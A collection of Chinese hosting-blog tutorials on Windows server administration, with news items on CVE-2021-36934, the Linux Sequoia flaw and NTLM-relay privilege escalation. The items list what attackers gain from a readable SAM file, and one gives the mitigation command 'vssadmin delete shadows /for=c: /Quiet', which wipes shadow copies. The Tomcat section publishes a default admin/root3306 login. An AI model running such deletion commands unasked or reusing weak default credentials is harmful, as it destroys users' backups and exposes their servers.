搞了半天才明白怎么弄,写个记录,希望可以帮助有需要的站长。 首先打开服务器管理器     点右上角,工具-计算机管理器     点磁盘管理 说明,磁盘0即是系统盘,磁盘1则是新增硬盘,有提示没有初始化。 2、我们点鼠标右键,选中“初始化磁盘(I)”,如下图: 出现初始化磁盘框, 购买新硬盘后,开机或打开服务器管理器后一般会提示初始化磁盘,如下图,所以如果出现此情况,可忽略以上步骤。 说明,分MBR和GPT的分区格式,小于2T我们一般用MBR格式即可。 点“确定” 3、我们发现磁盘1,状态为联机状态了。拉鼠标到右边,按右键,新建简单卷 下一步 出现简单卷大小,如果我们把整个硬盘分一个区(如此例,只分成D盘一个盘符),我们就默认下一步。 下一步 下一步,卷标处可删除此命名。 点完成。 等磁盘的格式化完成 如下图,状态良好。 关闭窗口,回到桌面,打开我的电脑,会发现多了一个本地磁盘了。可随意保存写入资料了。 全文完。 #### Windows10又被曝漏洞,受害者电脑沦为“肉鸡” 日前,一个Windows10本地提权漏洞被公开,一旦被攻击者利用,电脑里的任何应用都可能拥有系统权限,攻击者可以执行危害级别更高的恶意行为,受害者电脑沦为“肉鸡”。目前该漏洞尚未被修复,用户可以通过360安全卫士拦截利用此漏洞的攻击。近日,一位国外安全研究人员在twitter上公布了其发现的一个漏洞,并将漏洞的相关信息也同时发布在了Github上。不过,作者随后已经把此条twitter删除,并称“不想再提交给微软了”。目前,微软还尚未针对此漏洞发布补丁。此次被公开的漏洞是Windows10本地提权漏洞,如果被利用,任何用户都可以获取系统权限。这也就意味着,攻击者一旦掌握这一漏洞,就能够获得用户的系统级别权限,并执行低权限用户无法执行的恶意操作,大大提升攻击的危害程度!比如,本来“记事本”只是一个低权限的应用程序,通过使用漏洞来进行进一步操作之后,其权限便会被提升为SYSTEM级别。也就是说,如果攻击者利用该漏洞攻击了你的电脑,无论什么程序都可以获得系统权限,执行危害程度更高的恶意操作。截至目前,微软尚未发布针对此漏洞的补丁,所以现在漏洞仍然存在被攻击者利用的风险。不过广大用户无需过分担心,360安全卫士无需升级就能拦截此类攻击。安全专家提醒广大网友,对于个人电脑一定要保持良好的使用习惯,定时升级系统,可以安装360安全卫士等安全软件,及时拦截钓鱼网站、危险链接,并第一时间为系统打补丁、修复漏洞,实时保护电脑安全。 #### windows10系统如何更改hosts文件 最近主机吧把常用电脑系统更新到了win10系统,遇到很多麻烦,比如windows10系统会对hosts文件进行保护,导致这边有时候需要修改hosts文件根本无法保存。 主机吧这里来介绍下解决方法: 首先我们下载一个好用的文件编辑软件notepad,这个软件比win10自带的记事本强大得多,平常改代码文件用这个都不错,而且是免费的,具体下载大家百度了。 然后我们进入C:\Windows\System32\drivers\etc文件夹,找到hosts文件 右击选用notepad打开 输入内容后保存,提示hosts文件受保护,无法保存,是否要用管理员模式启用Notepad++ 点是,重新弹新窗口,这时候我们就会看到文件窗口显示超级管理员打开 我们再进行文件保存就可以成功了,是不是挺简单,如果我们的文章可以帮助你的,欢迎多多支持主机吧,关注我们吧,我们会不定时更新一些简单的教学。 #### Windows2008 r2如何开启ASP和FTP功能的方法 这篇文章主要介绍了Win2008 r2开启ASP和FTP功能的方法,需要的朋友可以参考下 作为服务器的基本配置,我们每个2008服务器管理人员,均有必要对该模块了如指掌。 以下是在Windows Server 2008 系统中,如何开启ASP和FTP模块,护卫神给大家一个详尽的讲解。 IIS在Win2008中,是以组建的方式加载的,因此不需要安装组建,只需要开启组建功能就可以,您可以从护卫神下载频道下载IIS7安装工具,或者手动如下操作: 1、在空的服务器中,点击服务器管理器(或者鼠标右键我的电脑,打开“管理”),添加角色: 2、添加服务器角色,选中“Web服务器(IIS)”,点击下一步: 3、点击左侧“角色服务”,选择列表中的对应选项,比如要支持ASP,就要选择ASP功能: 4、选择FTP功能支持,另外,如果要配套主机系统使用,请同时选择“管理工具”模块。 注意,上图的:摘要式身份认证,也一并选择上。 5、选择完毕,开始安装: 6、正在安装,稍等片刻。 7、安装完毕: 7、打开服务器管理,可以看到Web服务器已经安装成功: 8、如果要开设虚拟主机,需要建立一个FTP站点,我们为此整理了一个专门设置FTP的文章,请参见备注。 至此,您的2008服务器已经开始安装了IIS功能,开启了ASP支持和FTP支持,具备了安装虚拟主机管理系统的条件。 #### windows2008服务器如何启用PHP 最近遇一客户反馈网站打开好卡,经过这边检查原来他根本没有启动PHP语言。这是很多人新手犯的错误,经常有些客户没装ASP,或者PHP导致网站无法访问。今天主机吧来教大家如何在win2008系统启用PHP服务。 首先我们要先下载PHP,建议直接到官网下载http://www.php.net/,下载完压缩包后解压至C:\盘, 进入右击计算机,点管理   进入IIS管理 点Internet信息服务--网站--找到要开启PHP的网站名,点进入 找到ISAPI筛选器,添加PHP       确认后即可完成PHP启动。   #### windows2008服务器安装SSL证书https教学 https加密地址已经成为了趋势,可以预见未来几年http会逐步退出历史舞台,主机吧也已经早早更换了https,虽然百度搜索引擎宣称对https更优先排名,目前来说并不是很明显,不过并不妨碍我们对https在浏览器显示绿色小锁而展现出来的优越感。 要想成功架设SSL安全站点关键要具备以下几个条件。 1、需要从可信的证书办法机构CA获取服务器证书。 2、必须在WEB服务器上安装服务器证书。 3、必须在WEB服务器上启用SSL功能。 4、客户端(浏览器端)必须同WEB服务器信任同一个证书认证机构,即需要安装CA证书。   下面,我们对照上面的四部,进行一步一步的操作 1:需要从可信的证书办法机构CA获取服务器证书(由于我们是在本地做测试环境,而不是实际操作。所以这里我们自己创建一个证书。如果是实际的操作,需要通过域名商,来获取一个证书,这是要花钱的。) 2:必须在WEB服务器上安装服务器证书。 打开IIS,找到服务器证书、 点击创建自签名证书 输入你要创建的证书的名字,我这里取名 joeyssl   3、必须在WEB服务器上启用SSL功能。 接下来,我们新建一个本地测试站点,并且绑定刚才我们创建的证书。 打开 hosts 文件,用于创建一个站点的名称(例如 http://webjoeyssl    那么这个 webjoeyssl 就是我们需要创建的站点名称,我用hosts解析为本地) C:\Windows\System32\drivers\etc 在IIS里面绑定目录,绑定http和 https 在添加的时候,绑定类型,先选择 http 的类型,虽然这里有 https,但是还是首先要保证能通过 http能访问网站,毕竟大部分的人都是通过http来打开站点的,只是在某些特别需要加密的地方用到https,我们下一步会绑定 https的,这里先不急,除非你整个站点都是https运用,那么这里才只选择https。   上面的测试,已经能保证 http://webjoeyssl  以及  https://webjoeyssl 都可以打开网站了。   当然我们也可以强行设置必须要通过 ssl 才能访问站点(此时,只有https才能访问,而http 就无法访问了) 但是这样会出现一点问题,你访问http://webjoeyssl  ,浏览器会报错 4:客户端(浏览器端)必须同WEB服务器信任同一个证书认证机构,即需要安装CA证书。 我们打开 http://webjoeyssl/  或者是 https://webjoeyssl/    会提示不安全,点击继续浏览即可。在实际的环境中,你拿到的是一个实际的证书,所以不会产生类似的报告安全证书有问题、 #### windows2008解决必须使用角色管理工具安装或配置 NET3.5 sp1问题 win2008系统安装网站环境系统的时候常常提示:必须使用角色管理工具 安装或配置microsoft.net framework 3.5 sp1 ,导致安装不成功。 原因在于windows2008系统是集成microsoft.net framework 3.5 sp1 的,我们只需要在角色管理工具安装就可以了。具体操作如下: 进入计算机,右击管理 2. 找到角色,功能,添加功能 3. 勾选安装.net framework 3.51功能,点下一步完成安装。 #### windows2012系统如何挂载D盘 这篇文章主要介绍了win2012 挂载硬盘即增加新硬盘方法,需要的朋友可以参考下 点击左下角的服务器管理图标 点击右上角的“工具”,再选择“计算机管理” 再点击“磁盘管理” 在磁盘1的按钮处单击右键,选择“联机” 联机之后再在磁盘1的按钮处单击右键,选择“初始化磁盘” 点击“确定” 在未分配的空间处单击右键,选择“新建简单卷” 点击“下一步” 点击“下一步” 点击下一步 点击下一步 点击完成 好了以上就完成对win2012系统硬盘挂载了,有什么不懂的可以留言。 #### windows2016服务器远程 身份验证错误 要求的函数不受支持 解决办法 最新帮一客户处理云服务器,结果远程登陆时郁闷的提示:身份验证错误 要求的函数不受支持 之前客户也遇到过,不过到自己手上还是觉得挺麻烦的,首先网上都推荐要下载补丁,补丁太麻烦,更新到电脑的时候还要重启。正忙的时候哪有时间重启。 所以找到了一个主机吧认为比较简单的方法。 我们需要在本地电脑修改组策略设置(适用于windows7专业版/旗舰版以上) 打开运行:gpedit.msc 打开组策略编辑器 控制面板-系统-任据分配 找到加密Oracle修正,英文:Encryption Oracle Remeddiation 应用确定完之后就可以进行远程连接了。 注意:以上修改只需要在本地电脑修改哈,不是在服务器端修改的,很多站长不清楚这个,跑到服务器上修改是没啥用的。   #### Windows、Linux 纷纷被爆漏洞,黑客可直取 root 权限! 无论是开源还是闭源,没有绝对安全的操作系统。 一夕间,多款操作系统被爆存在安全漏洞,其中包括开发者最为常用的 Windows 和 Linux 操作系统也未能幸免。有研究人员发现,通过漏洞,黑客或恶意软件可绕过 Windows 和 Linux 系统的安全限制,并获得管理员级别的权限,造成设备内部的敏感/隐私资源泄露。 Windows 被“攻破” ? 事情要从 7月20日一位名为 Jonas Lykkegaard 发布的一则 Twitter 说起,其在帖子中指出,“由于某种原因,在 Windows11上,用户现在可以读取 SAM 文件。因此,如果你启用了 shadowvolumes,就可以像这样读取 SAM 文件了。” 在 Windows 系统中,所谓 SAM 文件指的是账号密码数据库文件。当用户登陆系统时,系统会自动地和 Config 中的 SAM 自动校对,如果登录的用户名和密码与 SAM 文件中加密的数据一致,那么会成功登录,否则登陆失败。 因此如果除了管理员之外的任何人有权限访问到 SAM 文件,相当于他们可以提取到加密的密码数据,这也意味着他人已经掌握了进入自家大门的一把钥匙,可以来去自如,甚至可以在易受攻击的计算机设备上创建一个全新的帐户。与此同时,非管理员用户也可以直接将自己的权限提升到 Windows 中的最高级别 System。然而,不仅是在全新的 Windows11预览版中,有网友发现,在 Windows10最新版本里面也发现了同样的问题。 在这一漏洞披露之后,引发不少研究人员的关注,其中@Benjamin Delpy 还进行了一波演示验证证实了该漏洞的存在: 在深入研究该漏洞出现的原因时,美国电脑紧急应变小组(US Computer Emergency Readiness Team)表示,从 Windows10build1809版本开始,非管理用户被授予访问 SAM、 SYSTEM 和 SECURITY 注册表配置单元文件的权限,而由于这一错误,本地用户的系统权限被提升。同时,该漏洞存在于 Volume Shadow 复制服务中,该服务运行操作系统或应用程序在不锁定文件系统的情况下让录制整个磁盘的“时间点快照”的 Windows 功能被打开。 这一配置错误直接导致 Windows 在系统驱动器的卷影副本(VSS)可用的情况下,非管理员用户可直接读取 SAM 这些数据库,同时,更方便黑客: 提取和利用账户的哈希密码; 发现原始的 Windows 安装密码; 获取 DPAP 计算机密码,可用于解密所有计算机私钥; 获得一个电脑机器账号,可以用来进行白银票据(silver ticket)攻击。 简单来看,“经过本地身份验证的攻击者可能能够实现本地权限提升、伪装成其他用户或实现其他与安全相关的影响。” 这可用于借助恶意软件彻底感染系统、窥探其他用户等。 也许很多用户会认为自己的计算机是安全的,但 US Computer Emergency Readiness Team 公告指出,“在某些配置中,VSS 卷影副本可能不能用,但是,只需拥有一个大于128GB 的系统驱动器,然后执行 Windows 更新或安装 MSl 即可让 VSS 卷影副本自动创建。” 当然如果你想检查一下自己的系统是否有可用的 VSS 卷影副本,可以使用一下命令: vssadmin list shadows 与此同时,微软也证实了这一漏洞的存在,该漏洞的 ID 为 CVE-2021-36934,微软对该安全漏洞的利用评估是“有可能被利用”,并表示(https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934): 由于对多个系统文件(包括安全帐户管理器 (SAM) 数据库)的访问控制列表 (ACL) 过于宽松,因此存在特权提升漏洞。成功利用此漏洞的攻击者可以使用 SYSTEM 权限运行任意代码。然后攻击者可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。 微软称当前正在调查受影响的 Windows 版本并致力于修复,在正式的解决方案/补丁尚未发布之前,其也提出了两种临时的办法: 一种是限制对 %windir%\system32\config 内容的访问。易受攻击的系统可以为 %windir%\system32\config 目录中的文件启用 ACL 继承,可以用管理员身份运行以下命令提示符: icacls %windir%\system32\config\*.* /inheritance:e 一旦针对这些文件更正了 ACL,就必须删除系统驱动器的任何 VSS 卷影副本,以保护系统免受攻击。这可以通过以下命令完成,假设你的系统驱动器是“c:”: vssadmin delete shadows /for=c: /Quiet 通过再次运行 vssadmin list shadows 确认 VSS 卷影副本已被删除。请注意,依赖现有卷影副本的任何功能(例如系统还原)都不会按预期运行。新创建的卷影副本将包含正确的 ACL,将按预期运行。 另外一种是删除卷影复制服务 (VSS) 卷影副本。 更多操作细节可参考:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934 Linux 也未能幸免 无独有偶,除了 Windows 被爆有漏洞外,研究人员还在 Linux 内核文件系统中发现了一个 size_t-to-int 类型转换安全漏洞——CVE-2021-33909,任何非管理员用户都可以在易受攻击的设备上获得 root 级权限。 发现该漏洞的安全公司 Qualys 团队研究人员将其称为 Sequoia,并表示“该漏洞存在于 Ubuntu20.04、Ubuntu20.10、Ubuntu21.04、Debian11和 Fedora34Workstation 的默认安装中。其他 Linux 发行版可能容易受到攻击并且可能被利用。” 据悉,2014年以后的所有 Linux 内核版本都存在这一漏洞,Qualys 指出要想完全修复此漏洞,必须要修补内核,此外,其也提供了一些缓解措施(https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909): 将 /proc/sys/kernel/unprivileged_userns_clone 设置为0,以防止攻击者在用户命名空间中挂载长目录。但是,攻击者可能会通过 FUSE 挂载一个长目录,目前不排除有这种可行性,如果攻击者 FUSE-mount 一个长目录(超过8MB),那么 systemd 会耗尽其堆栈,从而导致整个操作崩溃系统。 将 /proc/sys/kernel/unprivileged_bpf_disabled 设置为1,以防止攻击者将 eBPF 程序加载到内核中。然而,攻击者可能会破坏其他 vmalloc() 化的对象(例如,线程堆栈)。 对于普通用户而言,在等待官方的更新补丁之前,也切记不要下载或点击安装自己所不熟悉的软件,防止恶意软件造成信息泄露。与此同时,也需关注及检查设备是否有最新的更新,保证及时安装减少漏洞带来的影响。 #### Windows全新高危漏洞 Windows 10全部中招 3月24日 消息:前阵子微软披露了一个高危漏洞“永恒之黑”(CVE-2020-0796),攻击者利用该漏洞无须权限即可实现远程代码执行,一旦被成功利用,或波及全球 10 万服务器。 而昨日,微软又披露了一个全新的Windows系统高危漏洞。报道称,该漏洞影响所有受支持的Win10 版本,并且目前被黑客通过“有限的针对性攻击”加以利用。 据介绍,该漏洞涉及Win10 字体有关的Adobe Type Manager库,攻击者可欺骗用户打开特制文档或在Win10 预览窗格中查看它。 目前,该漏洞并无可用的修复程序,用户可选择在Win10 资源管理器中禁用“预览窗口”和“详细信息窗口”临时解决这个问题。微软表示将会在下一个星期二补丁( 4 月 14 日)推送更新解决该问题。 #### windows宝塔安装 FTP服务器端提示端口 21 被占用的解决办法 今天帮一小白客户安装宝塔,结果在安装FTP服务的时候提示21端口被占用,查了下才知道原来这服务器原来已经用IIS创建过FTP了,导致21端口占用。 解决办法很简单,进入IIS,,右键点击IIS默认FTP站点,再点击停止,就可以停掉他,这时候你再去安装宝塔环境助手中的FTP Sever就可以畅通无阻了。 本文一方面是自己遇到的问题记录下来,另一方面是写给有遇到同样问题的网友参考。 #### windows服务器一键整合安装tomcat和iis (java环境) Windows下一键整合tomcat和iis 请先下载 http://downinfo.myhostadmin.net/tomcatiis.rar 压缩包须解压到D盘,运行setup.bat开始安装 默认将添加为服务自动运行,务必保证默认站点是运行状态 manager用户名admin密码root3306 版本说明: jdk-7u11-windows-i586 apache-tomcat-6.0.36 tomcat-connectors-1.2.37 整合包: mysql-connector-java-5.1.5-bin.jar sqljdbc.jar commons-dbcp-1.2.1.jar msbase.jar mssqlserver.jar msutil.jar 配置文件目录: D:\jsp\tomcat\conf 使用tomcat整合iis后常见问题: 1.域名绑定: 请将java程序的域名绑定到iis的默认站点 2.java站点设置: 整合后,java站点将不受iis与网站管理助手管理 请自行在tomcat配置文件目录D:\jsp\tomcat\conf 按照常规流程配置tomcat即可 #### windows电脑更换DNS服务器教学 DNS服务器是本地电脑连接域名的重要桥梁,如果DNS服务器出问题了,我们访问域名就会出问题,无法正常解析到域名的IP。比如谷歌出的公共DNS8.8.8.8和8.8.4.4,在国内是被禁的,导致使用谷歌DNS的电脑根本无法正常访问网页。所以DNS是我们正常上网的基本。国内电信运营商每个省份都有自己的DNS服务器,一般帮装宽带的运营商都帮设置DNS。也有第三方的,比如腾讯的DNS:119.29.29.29,阿里云的DNS:223.5.5.5 223.6.6.6, 114的DNS:114.114.114.114 和 114.114.115.115稳定的DNS服务器非常重要,如果哪天你发现你访问网页的时候,浏览器一直显示正在解析中,你可以考虑更换下DNS服务器试试。今天我们来学习下如果给本地电脑更换DNS服务器: Windows 8 打开Windows 8系统控制面板,点击右上角的以图标方式显示,点击“网络和共享中心”选项。 点击网络和共享中心左侧的“更改适配器设置”链接,如下图: 选中正在联网的网络连接,我这里是,鼠标右键菜单里选择“属性” 在网络连接属性窗口中选中“Internet 协议版本 4 (TCP/IPv4)”,然后点击“属性”。 选择使用指定的DNS,在DNS服务器地址中输入223.5.5.5 和 223.6.6.6,输入后确定退出即设置完成。 Windows 7 通过单击「开始」按钮 「开始」按钮的图片,然后单击“控制面板”,打开“网络连接”。 在搜索框中,键入适配器,然后在“网络和共享中心”下,单击“查看网络连接” 右键单击要更改的连接,然后单击“属性”。 需要管理员权限 如果系统提示您输入管理员密码或进行确认,请键入该密码或提供确认 单击“联网”选项卡。在“此连接使用下列项目”下,单击“Internet 协议版本 4 (TCP/IPv4)”或“Internet 协议版本 6 (TCP/IPv6)”,然后单击“属性” 单击“使用下面的 DNS 服务器地址”,然后在“首选 DNS 服务器”和“备用 DNS 服务器”框中,键入主 DNS 服务器和辅助 DNS 服务器的地址 Windows VISTA 点击“开始”按钮,然后选择控制面板 点击“查看网络状态和任务”。 点击“查看状态”。 点击“ 属性 ”按钮。 Vista可能会要求您的许可才能进行更改。如果是这样,单击“ 继续”按钮。 选择Internet协议版本4(TCP/IPv4) ,然后单击“属性”按钮 。 单击“使用下面的DNS服务器地址”,然后在首选DNS服务器和备用DNS服务器中输入 223.5.5.5 和223.6.6.6。 点击OK按钮,然后点击“关闭”按钮,再次点击“关闭”按钮,关闭网络和共享中心的窗口 。 Windows XP 从开始菜单中选择控制面板 从控制面板选项中单击网络连接。 从网络连接窗口中选择您的连接。如果你有不止一个连接,选择你的默认/当前连接。 右键点击属性 选择internet协议(TCP/IP)然后单击属性。 单击“使用下面的DNS服务器地址”, 在首选DNS服务器和备选DNS服务器中输入223.5.5.5 和223.6.6.6。 如果还是不会的,也可以下载一键更换DNS软件:http://www.alidns.com/static/soft/AliDNS.exe #### windows系统VPS/云服务器远程登录图文教学 很多刚接触远服务器的站长不知道如何远程登陆服务器,这里我们以windows系统为例,给大家做个教程 点本地电脑开始》运行(或者按"window+R")》输入mstsc点确定 弹出远程连接的框输入IP连接, 如果是VPS,直接输入IP地址即可。 如果是弹性云主机,请在这里输入: ip:33890 ,如 118.123.1.1:33890  因为弹性云主机的默认端口是33890,不是3389,所以需要加上端口号。 连接上然后输入用户名和密码就可远程登录服务器   #### Windows系统刷新本地DNS缓存的方法 经常有使用百度云加速的站长向主机吧反馈说接入百度云加速快几个小时了,而本地ping域名却一直显示源服务器IP并没有显示隐藏起来。这个原因其实就是本地DNS缓存没更新,说简单的就是解析了,但没生效。一般的处理方法是慢慢等生效,因为DNS缓存最长就是48小时左右会全部生效,所以没必要担心。但如果你急着看效果就只能刷新本地DNS缓存了,方法如下:按键盘win键+R(或者点开始-运行),输入cmd,打开命令行工具!在命令行工具中输入ipconfig/flushdns 执行DNS缓存清理!这样,基本上只要你DNS生效了,清除缓存都是有效果的!也许在执行后会出现无法刷新DNS解析缓存,这是因为你的电脑没有开启本地的“DNS Client”服务,只需要手动清理下就可以了!开启本地的“DNS Client”服务按键盘win键+R,输入services.msc,打开服务!找到DNS Client服务,右键启动即可!然后再重复在命令行工具输入DNS缓存清理命令即可!别外我们要确保域名方的DNS更改确实生效了,如果没生效那刷新还是原来的DNS,自然也解决不了问题,所以选择好点的域名服务商很重要,一般国内的网站一定要选国内的,因为海外域名改DNS生效是非常慢的,因为出国了。 #### windows系统如何使用软件异地同步数据(灾备) Syncthing是一个开源文件同步工具,可以在多台设备之间实时同步文件或文件夹,官方网站:https://syncthing.net/   下载地址:https://syncthing.net/downloads/ ,一般推荐下载图形界面SyncTrayzor。 官方下载地址: https://github.com/canton7/SyncTrayzor/releases/download/v1.1.29/SyncTrayzorSetup-x64.exe(64位系统)https://github.com/canton7/SyncTrayzor/releases/download/v1.1.29/SyncTrayzorSetup-x86.exe(32位系统) 备用地址: http://download.myhostadmin.net/tools/SyncTrayzorSetup-x64.exe (64位系统) http://download.myhostadmin.net/tools/SyncTrayzorSetup-x86.exe (32位系统) 现在一般都是64位系统,同步源服务器和同步服务器都需要安装。SyncTrayzor安装需要asp.net支持,按提示进行安装即可。 安装以后如果运行报错:Failed to initialize config: config file version (37) is newer than supported version (35). If this is expected, use -allow-newer-config to override. 首先尝试在SyncTrayzor上方点击 Syncthing -> 结束全部Syncthing进程 然后重启Syncthing;如果没有效果,可以在 文件 -> 设置 -> Syncthing -> 高级 -> Syncthing命令行选项 处输入"-allow-newer-config",保存并然后结束全部synctiong进程后重新启动。 1、安装好以后启动Syncthing,第一次可能会启动没有响应,尝试在SyncTrayzor上方点击 Syncthing -> 结束全部Syncthing进程 然后重启Syncthing,启动以后可以将语言切换为中文。 2、设置添加远程设备。 同步默认使用的是22000端口,防火墙需要先放行端口,防火墙放行端口可以参考:https://www.west.cn/faq/list.asp?unid=420  为避免混乱,可以修改重命名设备名称。点击右上角“操作”--“设置” 可以修改,数据源服务器比如可以修改为“数据源端”,同步端服务器可以修改为"同步备份"。 点击“操作”-- “显示ID”,复制设备ID号 在另外一台服务器的Syncthing点击添加远程设备,复制设备ID进行添加。 添加以后另外一台设备过一会就会收到请求,点击“添加设备”进行联机。 连接成功以后可以看到两边都是互相联机状态 3、设置添加同步目录。 syncthing原本有一个Default Folder默认的文件夹,可以不用理会这个目录,也可以将其删除,如果想要删除,点击文件夹,然后点击“选项”,然后将文件夹移除。 同步备份端设置同步接收目录: 在备份端Syncthing点击右上角“操作”-- “设置”-- “编辑文件夹默认值”,添加设置一个默认的接收保存目录。 数据源端添加文件夹: 数据源端Syncthing界面点击“添加文件夹”按钮添加设置需要同步的目录 不建议加密,如果加密,同步端接收到的数据会被加密,需要单独用命令解密,如果忘记密码将无法解密数据。 由于是数据源端,所以文件夹类型只需要发送即可,所以选择“仅发送”,并注意勾选“忽略文件夹权限”,否则可能会造成权限问题无法同步。 备份同步端服务器: 数据源端添加文件夹设置保存以后,备份同步端会接收到共享推送,按图所示进行设置,由于是接受备份端,所以文件夹类型可以只选择“仅接收”,添加保存后会自动同步下载数据。 同步多个不同目录,在数据源端服务器的syncthing继续添加文件夹即可,但备份同步端都需要添加同步请求,这样就很麻烦,所以可以单独设置自动添加。在备份同步端上操作,点击远程设备的“选项”按钮,在“共享”菜单栏里面勾选“自动接受” 这样数据源端添加新的共享文件夹时,备份端会自动添加同步。 #### windows系统如何远程登陆预装了windows系统云服务器 虽然云服务器已经很普及了,但还是有些新手不大懂如何远程,这里主机吧给大家做个教学,希望可以帮助大家。 点本地电脑开始--运行(或者按"window+R")--输入mstsc 回车确认。 在弹出远程连接的框输入IP:端口连接 输入: ip:端口 ,如 118.123.1.1:11373 (11373是端口,请根据服务商提供的端口号填写) 输入用户名administrator 和密码就可远程登录服务器 win10会提醒风险,选择是进行连接。   这样就完成远程了,是不是很简单! #### Windows系统安全风险-本地NTLM重放提权怎么解决? 近期利用NTLM重放机制入侵Windows 系统事件增多,入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以不会进行修复,为了您的服务器安全,我们建议您进行一下安全调整: 1、关闭DCOM功能下面列出关闭DCOM步骤win2008/2012/2016/2019均适用 打开 控制面板->管理工具->组件服务 展开 组件服务-计算机 ,右击 我的电脑  选择 属性 点击 默认属性选项卡,取消勾选 “在此计算机上启用分布式COM”的,再确定即可 建议使用windows的都关闭此项以减小被入侵风险。您也可以直接在命令行执行 reg add HKLM\SOFTWARE\Microsoft\Ole /v EnableDCOM /t REG_SZ /d N /f 进行关闭。 2、如果在使用iis,建议删除IIS中的IIS6管理兼容服务器管理-管理-删除角色和功能 取消iis6管理兼容的所有勾选 提权案例: https://mp.weixin.qq.com/s/qxCoQ9Zne6CibRbJMURiFA     请务必重视做好安全设置 #### windows系统服务器如何查看宽带实时真实使用量 我们在使用云服务器的时候经常会遇到宽带有时候超了,想查看网站现在使用具体宽带多少,很多服务商控制台都是提供宽带监控功能,比如阿里云就有提供宽带监控功能,不过这种监控往往有时候不怎么准确或者不及时的问题。 如何准确及时的查看服务器具体宽带使用多少呢? 其实很简单,我们只要利用 windows的资源监控器即可查看。 远程登陆windows服务器后,在任务栏右击鼠标,启动任务管理器 点性能,进入资源监视器 即可查看当前服务器网络传输速度,以及网络使用率 是不是很简单,有问题的留言主机吧,欢迎多多关注主机吧博客,我们会继续更新一些对大家有帮助的教学。 #### windows系统运行CMD命令名详细大全 在运行菜单里键入CMD,就可以调出CMD命令窗口,有关某个命令的详细信息,请键入 HELP 命令名ASSOC 显示或修改文件扩展名关联。 AT 计划在计算机上运行的命令和程序。 ATTRIB 显示或更改文件属性。 BREAK 设置或清除扩展式 CTRL+C 检查。 CACLS 显示或修改文件的访问控制列表(ACLs)。 CALL 从另一个批处理程序调用这一个。 CD 显示当前目录的名称或将其更改。 CHCP 显示或设置活动代码页数。 CHDIR 显示当前目录的名称或将其更改。 CHKDSK 检查磁盘并显示状态报告。 CHKNTFS 显示或修改启动时间磁盘检查。 CLS 清除屏幕。 CMD 打开另一个 Windows 命令解释程序窗口。 COLOR 设置默认控制台前景和背景颜色。 COMP 比较两个或两套文件的内容。 COMPACT 显示或更改 NTFS 分区上文件的压缩。 CONVERT 将 FAT 卷转换成 NTFS。您不能转换当前驱动器。 COPY 将至少一个文件复制到另一个位置。 DATE 显示或设置日期。 DEL 删除至少一个文件。 DIR 显示一个目录中的文件和子目录。 DISKCOMP 比较两个软盘的内容。 DISKCOPY 将一个软盘的内容复制到另一个软盘。 DOSKEY 编辑命令行、调用 Windows 命令并创建宏。 ECHO 显示消息,或将命令回显打开或关上。 ENDLOCAL 结束批文件中环境更改的本地化。 ERASE 删除至少一个文件。 EXIT 退出 CMD.EXE 程序(命令解释程序)。 FC 比较两个或两套文件,并显示不同处。 FIND 在文件中搜索文字字符串。 FINDSTR 在文件中搜索字符串。 FOR 为一套文件中的每个文件运行一个指定的命令。 FORMAT 格式化磁盘,以便跟 Windows 使用。 FTYPE 显示或修改用于文件扩展名关联的文件类型。 GOTO 将 Windows 命令解释程序指向批处理程序中某个标明的行。 GRAFTABL 启用 Windows 来以图像模式显示扩展字符集。 HELP 提供 Windows 命令的帮助信息。 IF 执行批处理程序中的条件性处理。 LABEL 创建、更改或删除磁盘的卷标。 MD 创建目录。 MKDIR 创建目录。 MODE 配置系统设备。 MORE 一次显示一个结果屏幕。 MOVE 将文件从一个目录移到另一个目录。 PATH 显示或设置可执行文件的搜索路径。 PAUSE 暂停批文件的处理并显示消息。 POPD 还原 PUSHD 保存的当前目录的上一个值。 PRINT 打印文本文件。 PROMPT 更改 Windows 命令提示符。 PUSHD 保存当前目录,然后对其进行更改。 RD 删除目录。 RECOVER 从有问题的磁盘恢复可读信息。 REM 记录批文件或 CONFIG.SYS 中的注释。 REN 重命名文件。 RENAME 重命名文件。 REPLACE 替换文件。 RMDIR 删除目录。 SET 显示、设置或删除 Windows 环境变量。 SETLOCAL 开始批文件中环境更改的本地化。 SHIFT 更换批文件中可替换参数的位置。 SORT 对输入进行分类。 START 启动另一个窗口来运行指定的程序或命令。 SUBST 将路径跟一个驱动器号关联。 TIME 显示或设置系统时间。 TITLE 设置 CMD.EXE 会话的窗口标题。 TREE 以图形模式显示驱动器或路径的目录结构。 TYPE 显示文本文件的内容。 VER 显示 Windows 版本。 VERIFY 告诉 Windows 是否验证文件是否已正确写入磁盘。 VOL 显示磁盘卷标和序列号。 XCOPY 复制文件和目录树。 appwiz.cpl------------添加删除程序 control userpasswords2--------用户帐户设置 cleanmgr-------垃圾整理 CMD--------------命令提示符可以当作是 Windows 的一个附件,Ping,Convert 这些不能在图形环境下 使用的功能要借助它来完成。 cmd------jview察看Java虚拟机版本。 command.com------调用的则是系统内置的 NTVDM,一个 DOS虚拟机。它完全是一个类似 Virtual PC 的 虚拟环境,和系统本身联系不大。当我们在命令提示符下运行 DOS 程序时,实际上也 是自动转移到 NTVDM虚拟机下,和 CMD 本身没什么关系。 calc-----------启动计算器 chkdsk.exe-----Chkdsk磁盘检查 compmgmt.msc---计算机管理 conf-----------启动 netmeeting control userpasswords2-----User Account 权限设置 devmgmt.msc--- 设备管理器 diskmgmt.msc---磁盘管理实用程序 dfrg.msc-------磁盘碎片整理程序 drwtsn32------ 系统医生 dvdplay--------启动Media Player dxdiag-----------DirectX Diagnostic Tool gpedit.msc-------组策略编辑器 gpupdate /target:computer /force 强制刷新组策略 eventvwr.exe-----事件查看器 explorer-------打开资源管理器 logoff---------注销命令 lusrmgr.msc----本机用户和组 msinfo32---------系统信息 msconfig---------系统配置实用程序 net start (servicename)----启动该服务 net stop (servicename)-----停止该服务 notepad--------打开记事本 nusrmgr.cpl-------同control userpasswords,打开用户帐户控制面板 Nslookup-------IP地址侦测器 oobe/msoobe /a----检查XP是否激活 perfmon.msc----计算机性能监测程序 progman--------程序管理器 regedit----------注册表编辑器 regedt32-------注册表编辑器 regsvr32 /u *.dll----停止dll文件运行 route print------查看路由表 rononce 